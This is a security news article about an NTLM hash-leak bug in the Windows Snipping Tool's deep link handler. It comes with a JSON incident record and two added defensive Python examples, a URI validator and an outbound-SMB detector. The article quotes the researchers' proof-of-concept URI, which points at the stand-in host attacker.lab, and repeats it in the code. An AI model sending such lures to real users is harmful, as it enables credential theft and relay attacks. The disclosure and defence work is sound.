Microsoft Snipping Tool Vulnerability Exposes NTLM Hashes via Deep Link Abuse
A newly disclosed vulnerability in Microsoft’s Snipping Tool, tracked as CVE-2026-33829, allows attackers to capture NTLM authentication hashes through network spoofing: the victim’s machine is coerced into authenticating to an attacker-controlled SMB server, which records the NTLM challenge-response. Discovered by security researcher Margaruga of the BlackArrowSec Red Team, the flaw is an improper-validation bug in the app’s ms-screensketch deep link protocol handler.
The vulnerability stems from the filePath parameter: a crafted URI that sets it to a UNC path forces Windows to connect to a remote SMB share when the link is opened. The SMB client then attempts NTLM authentication, handing the user’s hashed credentials (a Net-NTLM response, which the attacker can crack offline or relay to another service) to the attacker’s server. Exploitation requires only minimal user interaction, such as clicking a malicious link or visiting a compromised webpage, which makes it a potent vector for social engineering attacks.
BlackArrowSec demonstrated the attack using a URI like:
ms-screensketch:edit?&filePath=\\attacker.lab\image.png&isTemporary=false&saved=true&source=Toast
When the link is opened, the Snipping Tool initiates an SMB connection to attacker.lab, exposing the NTLM response. Attackers could disguise such links as legitimate files (for example, company wallpapers or ID photos) to trick users into triggering the leak.
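The check the deep link handler was missing, written here as an added Python example (it is neither BlackArrowSec's proof-of-concept nor Microsoft's fix): it parses an ms-screensketch: URI shaped like the published one and rejects any filePath value that a Windows redirector would resolve over the network. It goes beyond the single PoC string above and also catches forward-slash UNC paths, the \\?\UNC\ form, percent-encoded backslashes, and file: URLs that name a host. The image-extension allow-list, the reason strings and the function names are assumptions for illustration, not anything taken from the page.

```python
"""Added example: filePath validation for an ms-screensketch: deep link.

Not BlackArrowSec's or Microsoft's code. Only drive-letter absolute paths to
image files are accepted; everything that could trigger an outbound SMB
(or WebDAV fallback) connection is rejected with a reason string.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCHEME = "ms-screensketch"
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")           # C:\... or C:/...
URL_LIKE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]+:")  # 2+ char scheme, so "C:" is not a URL
# Assumption: the handler only ever opens image files.
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def parse_screensketch_uri(uri):
    """Return (action, params) for an ms-screensketch: URI.

    parse_qs drops empty fields, so the stray '?&' in the published PoC is
    tolerated; for repeated keys only the first value is kept.
    """
    parts = urlsplit(uri.strip())
    if parts.scheme.lower() != SCHEME:
        raise ValueError(f"unexpected scheme {parts.scheme!r}")
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return parts.path, params


def classify_file_path(raw):
    """Return 'local' for an acceptable path, otherwise the rejection reason."""
    path = unquote(raw).strip()      # defence in depth against a second encoding layer
    if not path:
        return "missing filePath"
    if DRIVE_PATH.match(path):
        candidate = path
    elif URL_LIKE.match(path):
        url = urlsplit(path)
        if url.scheme.lower() != "file":
            return f"non-file URL scheme {url.scheme!r}"
        if url.netloc and url.netloc.lower() != "localhost":
            return f"file: URL names remote host {url.netloc!r}"
        candidate = unquote(url.path).lstrip("/")   # file:///C:/x.png -> C:/x.png
    else:
        candidate = path
    candidate = candidate.replace("/", "\\")
    if candidate.startswith("\\\\"):
        # \\host\share, \\?\UNC\host\share and \\.\device all start this way.
        # Extended-length local paths (\\?\C:\...) are rejected too, deliberately.
        return "UNC or device path"
    if not DRIVE_PATH.match(candidate):
        return "not an absolute drive-letter path"
    if not candidate.lower().endswith(IMAGE_EXTENSIONS):
        return "not an image file"
    return "local"


def check_uri(uri):
    """Verdict for a whole deep link: accept only a local image path."""
    try:
        action, params = parse_screensketch_uri(uri)
    except ValueError as exc:
        return {"accept": False, "reason": str(exc)}
    verdict = classify_file_path(params.get("filePath", ""))
    return {"accept": verdict == "local", "action": action, "reason": verdict}


# The URI published by BlackArrowSec, as quoted in the article above.
POC_URI = r"ms-screensketch:edit?&filePath=\\attacker.lab\image.png&isTemporary=false&saved=true&source=Toast"

if __name__ == "__main__":
    for u in (POC_URI,
              r"ms-screensketch:edit?filePath=C:\Users\me\Pictures\shot.png&isTemporary=false"):
        print(u, "->", check_uri(u))
```

A string check like this is only defence in depth: it cannot see that a mapped drive letter or a junction already points at a remote share, and it does nothing for the many other Windows features that open UNC paths. The durable controls for forced-authentication bugs are the vendor patch plus blocking outbound TCP 445/139 at the perimeter and restricting outgoing NTLM to remote servers by policy.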
While the flaw does not grant direct system access, stolen NTLM hashes can enable impersonation, lateral movement, or privilege escalation in enterprise environments. Microsoft addressed the issue in its April 14, 2026 security update, following disclosure to the vendor on March 23, 2026. BlackArrowSec published technical details and a proof-of-concept on April 15, 2026, with additional resources in their GitHub advisory (https://github.com/BlackArrowSec/redteam-research).
Source: https://cyberpress.org/windows-snipping-tool-vulnerability/
Microsoft Security Response Center cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security-response-center
{
  "id": "MIC1776342690",
  "linkid": "microsoft-security-response-center",
  "type": "Vulnerability",
  "date": "4/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}
{
  "affected_entities": [
    {
      "customers_affected": "Users of Microsoft Snipping Tool on Windows",
      "industry": "Software",
      "location": "Global",
      "name": "Microsoft",
      "size": "Enterprise",
      "type": "Technology Company"
    }
  ],
  "attack_vector": "Deep Link Abuse",
  "data_breach": {
    "data_exfiltration": "Yes (to attacker-controlled server)",
    "sensitivity_of_data": "High",
    "type_of_data_compromised": "NTLM authentication hashes"
  },
  "date_detected": "2026-03-23",
  "date_publicly_disclosed": "2026-04-15",
  "date_resolved": "2026-04-14",
  "description": "A newly disclosed vulnerability in Microsoft’s Snipping Tool, tracked as CVE-2026-33829, allows attackers to capture NTLM authentication hashes through network spoofing. The flaw exploits improper validation in the app’s `ms-screensketch` deep link protocol, forcing Windows to connect to a remote SMB share when a crafted URI is opened, leaking the user’s hashed credentials to an attacker-controlled server.",
  "impact": {
    "data_compromised": "NTLM authentication hashes",
    "identity_theft_risk": "High (if NTLM hashes are cracked)",
    "operational_impact": "Potential for impersonation, lateral movement, or privilege escalation",
    "systems_affected": "Windows systems with Microsoft Snipping Tool"
  },
  "investigation_status": "Resolved",
  "lessons_learned": "Improper validation in deep link protocols can lead to credential leakage. User awareness of social engineering risks is critical.",
  "post_incident_analysis": {
    "corrective_actions": "Patch released to validate deep link parameters and prevent unauthorized SMB connections",
    "root_causes": "Improper validation of the `filePath` parameter in the `ms-screensketch` deep link protocol"
  },
  "recommendations": "Apply Microsoft’s April 2026 security update immediately. Educate users on recognizing malicious links. Monitor for unusual SMB traffic.",
  "references": [
    {
      "date_accessed": "2026-04-15",
      "source": "BlackArrowSec GitHub Advisory",
      "url": "https://github.com/BlackArrowSec/redteam-research"
    }
  ],
  "response": {
    "containment_measures": "Security update released",
    "remediation_measures": "Patch issued in April 14, 2026 security update"
  },
  "title": "Microsoft Snipping Tool Vulnerability Exposes NTLM Hashes via Deep Link Abuse",
  "type": "Information Disclosure",
  "vulnerability_exploited": "CVE-2026-33829"
}
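The "monitor for unusual SMB traffic" recommendation in the record above, turned into an added Python example (not the page's, BlackArrowSec's or Microsoft's code): it scans network-connection events and reports host-initiated connections to TCP 445 or 139 whose destination lies outside the internal ranges you define, which is the network footprint a forced-authentication lure such as this one leaves. The sample events are constructed in a Sysmon-Event-3-like key=value form, and the field names, internal ranges, allow-list parameter and function names are assumptions for illustration.

```python
"""Added example: flag outbound SMB connections to external destinations.

Not the page's or BlackArrowSec's code. Input is one network-connection
event per line as key=value pairs (constructed, Sysmon-Event-3-like).
"""
import ipaddress
import re

SMB_PORTS = {445, 139}

# Assumption: internal address space is RFC 1918 plus loopback and link-local.
# ipaddress's is_private is deliberately not used here: it also treats the
# documentation ranges used in the sample below as private.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

_FIELD = re.compile(r"(\w+)=(\S+)")

# Constructed sample events (not real telemetry). Lines 2 and 4 show the kind
# of outbound SMB connection a UNC filePath lure produces; line 3 is ordinary
# web traffic and line 5 is an inbound connection.
SAMPLE_EVENTS = """\
UtcTime=2026-04-15T10:02:11 Initiated=true SourceIp=10.20.30.41 DestinationIp=10.20.30.5 DestinationPort=445
UtcTime=2026-04-15T10:02:19 Initiated=true SourceIp=10.20.30.41 DestinationIp=203.0.113.7 DestinationPort=445
UtcTime=2026-04-15T10:02:20 Initiated=true SourceIp=10.20.30.41 DestinationIp=203.0.113.7 DestinationPort=80
UtcTime=2026-04-15T10:03:02 Initiated=true SourceIp=10.20.30.41 DestinationIp=198.51.100.9 DestinationPort=139
UtcTime=2026-04-15T10:03:05 Initiated=false SourceIp=203.0.113.7 DestinationIp=10.20.30.41 DestinationPort=445
"""


def find_external_smb(events, internal_nets=INTERNAL_NETS, allowlist=()):
    """Return host-initiated SMB connections whose destination is external.

    allowlist: destination IPs legitimately reached over SMB across the
    perimeter (assumption: e.g. a sanctioned cloud file share).
    """
    allowed = {ipaddress.ip_address(a) for a in allowlist}
    hits = []
    for line in events.splitlines():
        ev = dict(_FIELD.findall(line))
        if ev.get("Initiated") != "true":
            continue                      # inbound SMB is a different detection
        try:
            port = int(ev["DestinationPort"])
            dst = ipaddress.ip_address(ev["DestinationIp"])
        except (KeyError, ValueError):
            continue                      # malformed line: skip rather than crash
        if port not in SMB_PORTS or dst in allowed:
            continue
        if any(dst in net for net in internal_nets):
            continue
        hits.append({"time": ev.get("UtcTime"), "src": ev.get("SourceIp"),
                     "dst": str(dst), "port": port})
    return hits


def summarize_by_source(hits):
    """Group external SMB destinations per source host for triage."""
    by_src = {}
    for h in hits:
        by_src.setdefault(h["src"], set()).add(f'{h["dst"]}:{h["port"]}')
    return {src: sorted(dsts) for src, dsts in by_src.items()}


if __name__ == "__main__":
    found = find_external_smb(SAMPLE_EVENTS)
    for hit in found:
        print(f"{hit['time']} {hit['src']} -> {hit['dst']}:{hit['port']} external SMB")
    print(summarize_by_source(found))
```

Any hit from a workstation is worth a look, because a healthy client has no reason to speak SMB to the Internet; the same events are the evidence base for a perimeter rule that blocks outbound 445/139 outright, which stops this class of leak regardless of which application is coerced.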